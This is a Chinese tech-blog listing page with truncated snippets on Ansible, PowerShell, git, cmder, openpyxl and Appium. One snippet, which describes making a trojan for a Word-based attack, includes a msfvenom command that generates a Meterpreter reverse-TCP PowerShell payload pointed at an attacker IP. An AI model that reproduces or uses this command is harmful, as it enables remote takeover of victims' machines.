在剧本中设置循环信息 vim test04.yml hosts: all remote_user: root tasks: name: Add Users user: name={{ item.name }} groups={{ item.groups }} state=present with_i ...
分类:
其他好文 时间:
2021-03-31 11:52:29
阅读次数:
0
文档链接 https://docs.ansible.com/ansible/latest/reference_appendices/config.html 配置文件 [defaults] inventory = /etc/ansible/hosts sudo_user=root remote_por ...
分类:
其他好文 时间:
2021-03-30 13:37:18
阅读次数:
0
#获取当前目录下的所有.proto 的文件信息 ls *.proto -r | % versioninfo #将当前文件夹下的 proto 文件复制到c盘的proto 文件夹 Copy-Item .\*\*.proto C:\proto -Recurse ...
分类:
系统相关 时间:
2021-03-26 15:22:26
阅读次数:
0
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:
系统相关 时间:
2021-03-18 14:14:35
阅读次数:
0
cmder介绍 简介 windows10中常用的命令行终端有cmd,powershell。其它需手动安装的终端有git bash(对于git命令),xshell(对于ssh连接远程主机附带linux命令) 集成多种终端,实现高效开发的命令行工具cmder,可以实现cmd,git,ssh,linux多 ...
分类:
其他好文 时间:
2021-03-18 14:03:40
阅读次数:
0
想起一个很好听的名字关注 22017.12.27 18:16:13字数 187阅读 72,109 今天在提交Git的时候,遇到了几个问题,记录一下,方便以后查找O(∩_∩)O 第一个问题 git remote add origin************** fatal: remote origin ...
分类:
其他好文 时间:
2021-03-16 14:12:17
阅读次数:
0
安装完webpack-cli之后,首次打包出现一下错误: 以管理员身份运行powershell 打开了powershell命令行之后,输入 set-ExecutionPolicy RemoteSigned 默认是n 选y就可以了 ...
分类:
移动开发 时间:
2021-03-16 11:49:12
阅读次数:
0
在配置好git环境后(即可以执行git命令): https://git-scm.com/downloads git init 初始化成git项目 git remote add origin https://github.com/18476305640/GitUp1.git 在项目加加入远程仓库信息, ...
分类:
其他好文 时间:
2021-03-16 11:44:47
阅读次数:
0
OpenPYXL是一个用于读/写Excel2010 XLSX/XLSM/XLTX/XLTM文件的python库 安装方式:python:pip install openpyxl 我的是anaconda:打开 anaconda powershell prompt 命令行:conda install o ...
分类:
编程语言 时间:
2021-03-15 11:28:38
阅读次数:
0
手机驱动对象 驱动对象会帮助我们完成手机和脚本之间交互. 导入driver对象 from appium import webdriver 声明手机驱动对象 只有声明驱动对象我们才可以让手机完成脚本的操作,声明的方法如下: driver = webdriver.Remote('http://127.0 ...
分类:
移动开发 时间:
2021-03-11 15:09:44
阅读次数:
0